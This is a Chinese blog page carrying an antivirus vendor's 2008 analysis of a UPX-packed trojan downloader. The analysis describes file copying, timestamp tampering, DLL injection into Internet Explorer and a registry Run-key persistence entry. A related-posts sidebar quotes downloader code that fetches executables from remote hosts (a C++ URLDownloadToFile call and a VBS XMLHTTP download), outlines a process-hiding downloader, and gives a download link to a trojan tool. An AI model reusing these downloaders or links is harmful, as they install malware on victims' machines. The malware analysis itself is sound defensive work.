木马下载器Trojan-Downloader.Win32.Small.nkb

FPGA中的CMAC硬核与Interlaken硬核 CMAC硬核和Interlaken硬核是FPGA中两种重要的内置功能模块,它们分别在CNN推理和高带宽芯片到芯片接口方面发挥着关键作用。FPGA(Field Programmable Gate Array,现场可编程逻辑门阵列)中的CMAC硬核与Interlaken硬核是两种重要的内置功能模块,它们在FPGA设计中扮演着关键角色。需要注意的是,FPGA设计中的硬核选择不仅取决于硬核本身的性能,还需要考虑硬核与FPGA芯片其他部分的兼容性、功耗、成本等因素。Interlaken硬核。 阅读详情
捕获时间

2008-04-12

病毒症状

该程序是使用VC编写的下载程序,由微点主动防御软件自动捕获,采用UPX加壳方式试图躲避特征码扫描,加壳后长度为8,704字节,图标为Windows默认可执行文件图标,病毒扩展名为exe,主要通过网页木马、文件捆绑的方式传播。

病毒分析
该木马程序被执行后,拷贝自身到%SystemRoot%/system32目录下,修改文件创建时间以及修改时间;通过API函数CreateProcessA运行病毒拷贝;后以批处理的形式将病毒原文件删除;
病毒拷贝运行后,在目录%SystemRoot%/system32下释放动态库wconl.dll,修改文件创建时间、修改时间;通过API函数CreateProcessA运行IEXPLORE.EXE,申请内存空间将wconl.dll写入,通过相关API函数激活病毒代码实现代码注入,访问恶意网站下载其他病毒程序并运行。

   Quote:
项:HKLM/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/Run/
键值:DownLmm
指向数据:%SystemRoot%/system32/病毒原文件  

感染对象

Windows 2000/Windows XP/Windows 2003

传播途径

网页木马、文件捆绑
 
电脑版微信多开,最详细教程没有之一 首先桌面任意的位置右键新建文本文档输入如下代码: TASKKILL /F/IM WECHAT.EXE start " " "D:\Program Files (x86)\Tencent\WeChat\WeChat.exe" start " " "D:\Program Files (x86)\Tencent\WeChat\WeChat.exe" ... 阅读详情

相关推荐

Y-Branch and a closed y-branch loop

双臂后面的区域,我们将它的双臂使用一个波导进行了连接,使得它本身形成了一个闭合回路,因此,该结构被称作。它们均是用来对经过它们的光束能量进行分割的一种器件。首先,我们知道一点,在光波导层面,今天给大家介绍一下,什么是。

u011699626的博客 599

木马下载器盗号数十种 破天木马剑指网游

木马下载器20480”(Win32.TrojDownloader.wmTable.a.20480),这是一个下载者病毒。此病毒文件为muma.exe的可执行文件,但并不局限于该名称,病毒传播者也可能给它取别的名字。它会从指定的网址下载一份下载列表,下载并执行列表中的数十种盗号木马程序。       “破天木马1851”(Win32.PSWTroj.OnlineGames.nc.18515),该病

Mitnick_2008的专栏 1374

HPESSMC-3.3.0.24724-win64.exe

hpe ssmc

寻求有效的TrojanWin32木马查杀方法

 寻求有效的TrojanWin32木马查杀方法!电脑中病毒,而且是顽固的难杀病毒,寻求高手支招!

tianshilover的专栏 4475

TrojanDownloader简单分析

这里是WinMain的入口,先读取最后自己最后160解密出要下载的url: 注册服务和写入注册表来加入自启动 没有下载过就开一个线程去下载执行 下载执行并且标记为已下载 ...

Cosmopolitan的博客 2862

关于Trojan.Rootkit.m病毒(一)

很不幸,今天第二次遭到这个家伙的攻击,上一次发生在3天前。症状是:瑞星杀毒软件频繁跳出发现该病毒,点击杀毒可以删除(文件为C:/WIndows/System32/remon.sys),但马上又出现,从网上的文章看,其它杀毒软件反映基本类似,就是不断弹出发现病毒警告。我的解决办法如下,仅供网友们参考。本机操作系统Windows 2003,瑞星杀毒和防火墙。1:启动到安全模式(已经不能正常启动,启动时

alphacsdn的专栏 3571

记一次Emotet木马下载器的分析

Part 1: 简要流程: 1. Sub Document_open()执行代码调用O15ho2roxnv7ybuidx.H4b0154n64u 2.1 H4b0154n64u调用 Fl5n0bbcb9wio()返回值: "winmgmts:win32_Process" 2.2 H4b0154n64u 调用 W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae) 2.3 H4b0154n64u 调用 Set Nw0s5mi0i4948 = W7iyi.

jxz_dz的博客 1969

穿过网络防火墙监视的木马下载器(转)

7月5日:今日提醒用户特别注意以下病毒:“下载器变种jk”(Win32.Troj.Downloader.jk)和“小魔女变种aa”(Win32.Hack.LittleWitch.aa)。   “下载器变种jk”(Win32.Tr...

cuankuangzhong6373的博客 596

VC无进程木马下载器源码(利用IE隐藏进程)

  一、 打开半年前的一个工程,是利用IE来隐藏进程下载的实例,我想灰鸽子也是类似原理吧!       下面是程序的主要思路:       1.获取程序自身路径,启动IE进程       2.获取到IE进程句柄       3.分配内存       4.获取进程映像的地址       5.得到内存镜像大小       6.确定起始基址

Koma的主页 3343

vc++编写一个木马下载器,体积仅有0.3K

#include #pragma link "w32inet.lib" int main(){HRESULT hRet=URLDownloadToFile(0,"http://www.1111.com/abc.exe","d://abc.exe",0,0); if(hRet==S_OK) {         printf("Download OK!/n");} else {         p

尹成的技术博客 3429

vbs下载者和powershell下载器

vbs Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://IP/test.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.T

yiyefangzhou24的专栏 2457

超级BT木马下载器 Gameservet.exe的分析 game1.exe 8888-521ww.exe qjso.exe

  今天接到了一个叫Gameservet.exe的样本 测试了一下 测试结果真的让人震惊 这是个超级变态的木马下载器当今流行的木马几乎都全了 而且最后还捣登出来个威金来 哎 现在的病毒都太厉害 那些无耻的制造病毒者 你们还让人活么?!越来越多的这类案例提示:每个用户应该做好自己系统的防护。不能仅仅指望一两款杀软保护自己系统的安全。对于病毒,防远重于杀。by baohe下面就说说测试过程:F

飘的梦客厅 5778

小心伪装成jpg图片文件的广告程序/木马下载器

endurer 原创2006-07-14 第1版 hxxp://sjzl.****9qian.com/上的图片文件 bb.jpg,会释放文件 setup.exe,采用 ASPack 加壳。 卡巴斯基报为:not-a-virus:AdWare.Win32.WSearch.g 江民KV报为:TrojanDownloader.Adload.hp...

caobihole 496

国家计算机病毒中心发现"木马下载器"新变种

天津理工大学 王小明(网络管理学生) 775

下载木马(QQ尾巴生成器)

链接:https://pan.baidu.com/s/1qs7o9wLKyRyfacTcK27acA 提取码:amcu

@涂涂博客 3803

一个比较难杀的木马下载器 kndncso.exe jvxnypf.exe cmdbcs.exe lRAVWL.EXE

这是一个比较难杀的木马下载器。可通过移动存贮介质传播。作者:baohe来源于:http://forum.ikaka.com/topic.asp?board=28&artid=8310697一、中毒后的SRENG日志:(注:中此毒后,SRENG须改名运行。原因见后述。)启动项目注册表[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVer

飘的梦客厅 2892

续上篇:比较彻底的清除"代理木马下载器"的方法

  今天才发现前天手工清除的"代理木马下载器"病毒不干净。它总是复活,甚至在我重装了N次系统以后,被改成www.4419.com的IE首页还在向我自豪地笑。最后终于发现。病毒原来隐藏在D盘的QQ里。今天花了一个晚上时间研究了一下它做些什么。下面是研究资料和我认为比较彻底的清除方法。 一、监视病毒网页、文件目录和注册表获得的信息 使用工具: filemonNT by Mark Russinovi...

weixin_34378767的博客 329

遭遇trojan-downloader.win32.agent.vjh

 今天下午开始本打算学习ARCIMS的,正是因为要学习它就装软件吧,为了节约内存我把卡巴给关掉,于是惹来了trojan-downloader.win32.agent.vjh木马,真够郁闷的。现象:一旦机器启动如果卡巴随机启动,于是卡巴会提示发现病毒并要求处理,你点击处理不一会机器就自动重启了。然而卡巴还是会报告这是什么病毒。解决:自己先是去删除windows文件下东西。根本不管用。最后上网

NONAME的专栏 1645

Virus.Win32.Induc.a 感染型病毒分析

 Virus.Win32.Induc.a 感染型分析一、<span class="t_tag" onclick="function onclick(){tagshow(event)}">文件信息文件大小:163840字节加壳类型:ASPack 2.12编写语言:Borland Delphi 6/7病毒类型:感染型二、病毒描述该<span class="t_tag"

RENYUAN 4659

JS脚本病毒调试脚本-Trojan[Downloader]:JS/Nemucod

1、前言 遇到Trojan[Downloader]:JS/Nemucod需要分析,这款病毒主要为js运行。从网上各种找js调试方法。发现52的帖子还挺沾边的。 TrojanDownloader:JS/Nemucod分析【原创+翻译】 https://www.52pojie.cn/forum.php?mod=viewthread&tid=513740 结果用帖子里的代码一调试,发现...

weixin_30794499的博客 1680

病毒HEUR:Trojan-Downloader.Win32.Generic

这个病毒一般是浏览网页留下的,病毒多在四个地方: C:/Documents and Settings/Administrator/Cookies C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files   C:/Documents and Settings/Default User/Co

Gin工作室 5223

STM32F103单片机HAL库例程-CAN口收发通讯实验.rar

1、嵌入式物联网单片机项目开发实战。例程经过精心编写,简单好用。2、代码使用KEIL HAL库开发,当前在STM32F103运行,如果是STM32F103其他型号芯片,依然适用,请自行更改KEIL芯片型号以及FLASH容量即可。3、软件下载时,请注意keil选择项是jlink还是stlink。4、技术v:349014857;5、如果接入其他传感器,请查看发布的其他资料。6、单片机与模块的接线,在代码当中均有定义,请自行对照。7、若硬件差异,请根据自身情况适当调整代码,程序仅供参考。8、代码有注释说明,请耐心阅读。

上一篇: BypassHIPS微点卡巴 with MS08025
下一篇: 驳eva的《有关主动防御》
iiprogram
博客等级 码龄25年 1066粉丝 1515原创
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值